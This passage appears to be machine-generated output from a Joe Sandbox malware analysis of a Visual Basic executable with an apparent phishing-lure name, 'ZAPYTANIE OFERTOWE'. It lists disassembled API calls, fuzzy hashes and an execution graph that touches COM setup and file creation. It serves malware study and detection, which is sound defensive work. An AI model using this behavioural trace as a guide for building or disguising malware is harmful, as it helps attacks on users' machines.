                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F0E775D00218CECF10EFA0DD44BEDB7B8BB48300F4081AAE54AA7560DB741A89CF69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041E68B
                                                                                                                                                                                                                                                      • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041E693
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0041E695
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(0041E706), ref: 0041E6F2
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041E6FA
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E703
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$AddrefFree$DestructExitProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 474453485-0
                                                                                                                                                                                                                                                      • Opcode ID: 080a92c9c3c2fb487e3bc96c2bebb315830741a64646396bf6efebd826edfebc
                                                                                                                                                                                                                                                      • Instruction ID: 667f1fbceb99d918350a8c93aba1b8ec047f02208f043dfad400775f7d70227f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 080a92c9c3c2fb487e3bc96c2bebb315830741a64646396bf6efebd826edfebc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6E0E531D60128AADB04DBA0ED55FED7B38BF14700F54406AF902B30E09F746945CFA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00420BA1
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00420BAB
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 00420BB4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00420BF8), ref: 00420BEB
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00420BF0
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00420BF5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$CloseFile$ExitProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2014117853-0
                                                                                                                                                                                                                                                      • Opcode ID: c3a2a4b37cd901fdd2dfd3f0805bf3e80cc1eed6359ebd58807123f09fd26edf
                                                                                                                                                                                                                                                      • Instruction ID: 1a74a742803cabf7b99f207da3827670e0b1cecb12e14af3a137c0d733611b17
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3a2a4b37cd901fdd2dfd3f0805bf3e80cc1eed6359ebd58807123f09fd26edf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FE01A71D04128CACB14ABE0FD4069C7BB4AB08310B904167A402B3174DB742985CF99
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,6CF7A323,6CF8D8B1,?), ref: 00418D1E
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaOnError.MSVBVM60(000000FF,00000000,?,?,?,Function_000032B6,?), ref: 00418D4E
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaRecUniToAnsi.MSVBVM60(004054A0,?,?), ref: 00418D6E
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D77
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaStrMove.MSVBVM60 ref: 00418D85
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418D93
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D9C
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaStrMove.MSVBVM60 ref: 00418DAA
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418DB8
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,DISPLAY,00000000), ref: 00418DCB
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaSetSystemError.MSVBVM60(00000000), ref: 00418DDD
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaRecAnsiToUni.MSVBVM60(004054A0,?,?), ref: 00418DF6
                                                                                                                                                                                                                                                        • Part of subcall function 00418D00: __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00418E2D
                                                                                                                                                                                                                                                        • Part of subcall function 004199F0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 00419A0E
                                                                                                                                                                                                                                                        • Part of subcall function 004199F0: __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 00419A3E
                                                                                                                                                                                                                                                        • Part of subcall function 004199F0: __vbaSetSystemError.MSVBVM60(?,00000001,00000000), ref: 00419A68
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000188), ref: 00418C86
                                                                                                                                                                                                                                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00418C96
                                                                                                                                                                                                                                                      • __vbaI4Var.MSVBVM60(?,00000000), ref: 00418CA9
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(00000000), ref: 00418CB8
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00418CC1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Ansi$Error$Free$ChkstkMoveSystem$CallCheckHresultLateList
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 873780948-0
                                                                                                                                                                                                                                                      • Opcode ID: 26f5b35a8f0ac3d08365d19e810842ecff9e3efcd4087d4e7403b082e305bca5
                                                                                                                                                                                                                                                      • Instruction ID: 16d286b73a6ce5193caf80716aadf59a34bdb77ef37626ee72a0c3f1c06fc46a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26f5b35a8f0ac3d08365d19e810842ecff9e3efcd4087d4e7403b082e305bca5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63211DB5900209ABCB00DF95C989DEFBBBCEF58704F10451EF901B7250DA74A985CBB5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416050
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416075
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041609F
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(0000000E,00417A20,?,00000000,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160B8
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160C7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CheckHresult$ErrorFreeNew2System
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3252491692-0
                                                                                                                                                                                                                                                      • Opcode ID: 599137fa2ae346e6f6b239c3f9cbb415c6691d3a238c125e19ddfd78296be001
                                                                                                                                                                                                                                                      • Instruction ID: 1035c00175c6c81f3f144980975e95b43d78c84e63a20c1226013f986c834cc1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 599137fa2ae346e6f6b239c3f9cbb415c6691d3a238c125e19ddfd78296be001
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30219570A40615EBCB20CFA5EE49E9FBF78FB58740F110126F105B32E0D7B499818BA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 00428D95
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428DBA
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A184,00000094), ref: 00428DE4
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF3
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CheckHresult$ErrorExitFreeProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4045702744-0
                                                                                                                                                                                                                                                      • Opcode ID: 21644dc461e17c184ab23e9b8ca1607b74b27591d762e838d52aee4660b45f3b
                                                                                                                                                                                                                                                      • Instruction ID: edda45edb35fde8433b36ffd3ef84c2269d30266a9ece54bd624009aaa599c45
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21644dc461e17c184ab23e9b8ca1607b74b27591d762e838d52aee4660b45f3b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34215870901214EFCB00DFA5CA48E9EBBF8FF98704F64456AF405B72A0CB7859458AA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000,-00000009,?,6CF7E251,0041FB86), ref: 00420F20
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(00000000,-00000009,?,6CF7E251,0041FB86), ref: 00420F27
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,6CF7E251,0041FB86), ref: 00420F4D
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,6CF7E251,0041FB86), ref: 00420F54
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,6CF7E251,0041FB86), ref: 00420F72
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$BoundsGenerate$Overflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2760075901-0
                                                                                                                                                                                                                                                      • Opcode ID: 8669df199ba3d32dd003e43707a03247d773872a69a830caabf4d64443806dda
                                                                                                                                                                                                                                                      • Instruction ID: 93c54f63ccc5981ea9e36820505c7139a37b1fec0ba499ff43ef88027195e6a9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8669df199ba3d32dd003e43707a03247d773872a69a830caabf4d64443806dda
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9F0F637B4416052C364477DEA8559AB3D7AB8C783BC20177E248576738DB858C143AD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _adj_fdiv_m64.MSVBVM60(?,?), ref: 0042AC13
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60(?,?), ref: 0042AC21
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0042AC5E), ref: 0042AC53
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042AC5B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Destruct$ExitProc_adj_fdiv_m64
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3272950176-0
                                                                                                                                                                                                                                                      • Opcode ID: 0a605c6e4ccc50bbb14004817ee39ccc39d0ef59e952a399e43dad9ab60bf25d
                                                                                                                                                                                                                                                      • Instruction ID: 432503350bff8fd263bfd7ee333f73b5f20f6540c55ce1ae75e3df8e8a0f3385
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a605c6e4ccc50bbb14004817ee39ccc39d0ef59e952a399e43dad9ab60bf25d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74F01730E48128EBDB209B51ED44BE8BB38BB54301F9080EAE58471094CBB95EE19F5A

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:3.4%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:2.1%
                                                                                                                                                                                                                                                      Signature Coverage:4.9%
                                                                                                                                                                                                                                                      Total number of Nodes:1778
                                                                                                                                                                                                                                                      Total number of Limit Nodes:49
                                                                                                                                                                                                                                                      execution_graph 84766 467046 84767 46705d 84766->84767 84777 467136 84766->84777 84768 4671a0 84767->84768 84769 46710d 84767->84769 84770 467199 84767->84770 84779 46706e 84767->84779 84772 41171a 75 API calls 84768->84772 84773 41171a 75 API calls 84769->84773 84800 40e380 VariantClear moneypunct 84770->84800 84785 4670f3 _realloc 84772->84785 84773->84785 84774 4670d2 84776 41171a 75 API calls 84774->84776 84775 41171a 75 API calls 84775->84777 84778 4670d8 84776->84778 84798 443466 75 API calls 84778->84798 84784 4670a9 moneypunct 84779->84784 84786 41171a 84779->84786 84782 4670e8 84799 45efe7 77 API calls moneypunct 84782->84799 84784->84768 84784->84774 84784->84785 84785->84775 84788 411724 84786->84788 84789 41173e 84788->84789 84792 411740 std::bad_alloc::bad_alloc 84788->84792 84801 4138ba 84788->84801 84819 411afc 6 API calls __decode_pointer 84788->84819 84789->84784 84796 411766 84792->84796 84820 411421 84792->84820 84793 411770 84824 41805b RaiseException 84793->84824 84823 4116fd 67 API calls std::exception::exception 84796->84823 84797 41177e 84798->84782 84799->84785 84800->84768 84802 41396d 84801->84802 84812 4138cc 84801->84812 84832 411afc 6 API calls __decode_pointer 84802->84832 84804 413973 84833 417f23 67 API calls __getptd_noexit 84804->84833 84809 413929 RtlAllocateHeap 84809->84812 84810 4138dd 84810->84812 84825 418252 67 API calls 2 library calls 84810->84825 84826 4180a7 67 API calls 7 library calls 84810->84826 84827 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84810->84827 84812->84809 84812->84810 84813 413959 84812->84813 84816 41395e 84812->84816 84818 413965 84812->84818 84828 41386b 67 API calls 4 library calls 84812->84828 84829 411afc 6 API calls __decode_pointer 84812->84829 84830 417f23 67 API calls __getptd_noexit 84813->84830 84831 417f23 67 API calls __getptd_noexit 84816->84831 84818->84788 84819->84788 84834 4113e5 84820->84834 84822 41142e 84822->84796 84823->84793 84824->84797 84825->84810 84826->84810 84828->84812 84829->84812 84830->84816 84831->84818 84832->84804 84833->84818 84835 4113f1 ___lock_fhandle 84834->84835 84842 41181b 84835->84842 84841 411412 ___lock_fhandle 84841->84822 84868 418407 84842->84868 84844 4113f6 84845 4112fa 84844->84845 84933 4169e9 TlsGetValue 84845->84933 84848 4169e9 __decode_pointer 6 API calls 84849 41131e 84848->84849 84850 4113a1 84849->84850 84943 4170e7 68 API calls 5 library calls 84849->84943 84865 41141b 84850->84865 84852 41133c 84853 411388 84852->84853 84856 411357 84852->84856 84857 411366 84852->84857 84854 41696e __encode_pointer 6 API calls 84853->84854 84855 411396 84854->84855 84858 41696e __encode_pointer 6 API calls 84855->84858 84944 417047 73 API calls _realloc 84856->84944 84857->84850 84860 411360 84857->84860 84858->84850 84860->84857 84862 41137c 84860->84862 84945 417047 73 API calls _realloc 84860->84945 84946 41696e TlsGetValue 84862->84946 84863 411376 84863->84850 84863->84862 84958 411824 84865->84958 84869 41841c 84868->84869 84870 41842f EnterCriticalSection 84868->84870 84875 418344 84869->84875 84870->84844 84872 418422 84872->84870 84903 4117af 67 API calls 3 library calls 84872->84903 84874 41842e 84874->84870 84876 418350 ___lock_fhandle 84875->84876 84877 418360 84876->84877 84878 418378 84876->84878 84904 418252 67 API calls 2 library calls 84877->84904 84886 418386 ___lock_fhandle 84878->84886 84907 416fb6 84878->84907 84881 418365 84905 4180a7 67 API calls 7 library calls 84881->84905 84884 4183a7 84889 418407 __lock 67 API calls 84884->84889 84885 418398 84913 417f23 67 API calls __getptd_noexit 84885->84913 84886->84872 84887 41836c 84906 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84887->84906 84891 4183ae 84889->84891 84893 4183e2 84891->84893 84894 4183b6 84891->84894 84895 413a88 ___crtsetenv 67 API calls 84893->84895 84914 4189e6 InitializeCriticalSectionAndSpinCount ___lock_fhandle 84894->84914 84897 4183d3 84895->84897 84929 4183fe LeaveCriticalSection _doexit 84897->84929 84898 4183c1 84898->84897 84915 413a88 84898->84915 84901 4183cd 84928 417f23 67 API calls __getptd_noexit 84901->84928 84903->84874 84904->84881 84905->84887 84910 416fbf 84907->84910 84908 4138ba _malloc 66 API calls 84908->84910 84909 416ff5 84909->84884 84909->84885 84910->84908 84910->84909 84911 416fd6 Sleep 84910->84911 84912 416feb 84911->84912 84912->84909 84912->84910 84913->84886 84914->84898 84917 413a94 ___lock_fhandle 84915->84917 84916 413b0d ___lock_fhandle _realloc 84916->84901 84917->84916 84918 413ad3 84917->84918 84920 418407 __lock 65 API calls 84917->84920 84918->84916 84919 413ae8 RtlFreeHeap 84918->84919 84919->84916 84921 413afa 84919->84921 84924 413aab ___sbh_find_block 84920->84924 84932 417f23 67 API calls __getptd_noexit 84921->84932 84923 413aff GetLastError 84923->84916 84927 413ac5 84924->84927 84930 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 84924->84930 84931 413ade LeaveCriticalSection _doexit 84927->84931 84928->84897 84929->84886 84930->84927 84931->84918 84932->84923 84934 416a01 84933->84934 84935 416a22 GetModuleHandleW 84933->84935 84934->84935 84936 416a0b TlsGetValue 84934->84936 84937 416a32 84935->84937 84938 416a3d GetProcAddress 84935->84938 84941 416a16 84936->84941 84956 41177f Sleep GetModuleHandleW 84937->84956 84940 41130e 84938->84940 84940->84848 84941->84935 84941->84940 84942 416a38 84942->84938 84942->84940 84943->84852 84944->84860 84945->84863 84947 4169a7 GetModuleHandleW 84946->84947 84948 416986 84946->84948 84950 4169c2 GetProcAddress 84947->84950 84951 4169b7 84947->84951 84948->84947 84949 416990 TlsGetValue 84948->84949 84953 41699b 84949->84953 84955 41699f 84950->84955 84957 41177f Sleep GetModuleHandleW 84951->84957 84953->84947 84953->84955 84954 4169bd 84954->84950 84954->84955 84955->84853 84956->84942 84957->84954 84961 41832d LeaveCriticalSection 84958->84961 84960 411420 84960->84841 84961->84960 84962 47ba63 84963 47bb10 84962->84963 84964 47ba7f 84962->84964 84965 47bad4 84964->84965 84966 47bab2 84964->84966 84967 47ba98 84964->84967 84979 47ba86 84964->84979 84968 453081 111 API calls 84965->84968 84970 453081 111 API calls 84966->84970 84969 453081 111 API calls 84967->84969 84971 47baf0 84968->84971 84969->84979 84973 47bac9 84970->84973 84974 453081 111 API calls 84971->84974 84976 453081 111 API calls 84973->84976 84977 47baf7 84974->84977 84975 47bb09 84987 47a999 84975->84987 84976->84979 84980 453081 111 API calls 84977->84980 84981 453081 84979->84981 84980->84979 84982 45308c 84981->84982 84983 4530aa 84981->84983 84984 4530a1 84982->84984 85032 452e2a 111 API calls 5 library calls 84982->85032 84983->84975 84984->84975 84986 453098 84986->84975 85033 40c060 84987->85033 84990 40c060 75 API calls 84991 47a9c2 84990->84991 84992 40c060 75 API calls 84991->84992 84993 47a9cb 84992->84993 85038 4092c0 84993->85038 84995 47a9f0 84996 47aa02 OleInitialize 84995->84996 84997 47aa10 84995->84997 84996->84997 85042 40fff0 84997->85042 84999 47aa1c CLSIDFromProgID 85000 47aa35 84999->85000 85001 47aa3c 85000->85001 85002 47aa95 CoCreateInstance 85000->85002 85003 47ab2c 85000->85003 85046 4781ae 140 API calls 85001->85046 85002->85001 85004 47aab6 85002->85004 85060 4580e1 82 API calls _memset 85003->85060 85004->85001 85010 47aae4 85004->85010 85007 47ab52 85007->85001 85008 47ab5f CoInitializeSecurity 85007->85008 85009 47ab81 _memset 85008->85009 85061 4342a8 CoTaskMemAlloc _wcslen _wcscpy 85009->85061 85047 467626 85010->85047 85013 47ab99 85031 47ac3c _memset _wcslen 85013->85031 85062 4021e0 85013->85062 85014 47aa4d 85014->84963 85016 47acd2 CoCreateInstanceEx 85016->85001 85017 47ad16 85016->85017 85017->85001 85021 47ad5b 85017->85021 85022 47ad2b CoSetProxyBlanket 85017->85022 85018 47abb3 85019 47abc9 85018->85019 85074 4646f6 75 API calls 85018->85074 85019->85031 85021->85004 85023 47ad7b 85021->85023 85022->85021 85023->85001 85024 47aaf3 85024->84963 85025 47abf6 85075 40df50 75 API calls 85025->85075 85027 47ac00 85076 460976 75 API calls 85027->85076 85029 47ac32 85077 40df50 75 API calls 85029->85077 85031->85016 85031->85019 85032->84986 85034 41171a 75 API calls 85033->85034 85035 40c088 85034->85035 85036 41171a 75 API calls 85035->85036 85037 40c096 85036->85037 85037->84990 85039 4092c8 moneypunct 85038->85039 85040 429db0 VariantClear 85039->85040 85041 4092d5 moneypunct 85039->85041 85040->85041 85041->84995 85043 40fff7 _wcslen 85042->85043 85044 41171a 75 API calls 85043->85044 85045 41000e _wcscpy 85044->85045 85045->84999 85046->85014 85048 4092c0 VariantClear 85047->85048 85049 467635 85048->85049 85050 467699 85049->85050 85078 45e912 132 API calls 2 library calls 85049->85078 85050->85024 85052 467643 85052->85050 85079 467214 132 API calls _realloc 85052->85079 85054 46764e 85054->85050 85055 41171a 75 API calls 85054->85055 85056 467660 VariantInit VariantCopy 85055->85056 85056->85050 85057 46767a VariantClear 85056->85057 85058 46768b moneypunct 85057->85058 85059 4092c0 VariantClear 85058->85059 85059->85050 85060->85007 85061->85013 85063 4021f1 _wcslen 85062->85063 85064 42a598 85062->85064 85066 402205 85063->85066 85067 402226 85063->85067 85084 40c740 85064->85084 85080 404020 75 API calls moneypunct 85066->85080 85081 401380 85067->85081 85070 42a5a2 85071 40220c _realloc 85071->85018 85073 41171a 75 API calls 85073->85071 85074->85025 85075->85027 85076->85029 85077->85031 85078->85052 85079->85054 85080->85071 85082 41171a 75 API calls 85081->85082 85083 401387 85082->85083 85083->85070 85083->85073 85085 40c752 85084->85085 85086 40c747 85084->85086 85085->85070 85086->85085 85089 402ae0 85086->85089 85088 42a572 _realloc 85088->85070 85090 42a06a 85089->85090 85091 402aef 85089->85091 85092 401380 75 API calls 85090->85092 85091->85088 85093 42a072 85092->85093 85094 41171a 75 API calls 85093->85094 85095 42a095 _realloc 85094->85095 85095->85088 85096 3ee05ab 85097 3ee05b2 85096->85097 85098 3ee05ba 85097->85098 85099 3ee0650 85097->85099 85103 3ee0260 85098->85103 85116 3ee0f00 9 API calls 85099->85116 85102 3ee0637 85117 3eddc50 85103->85117 85106 3ee0330 CreateFileW 85107 3ee02ff 85106->85107 85113 3ee033d 85106->85113 85108 3ee0359 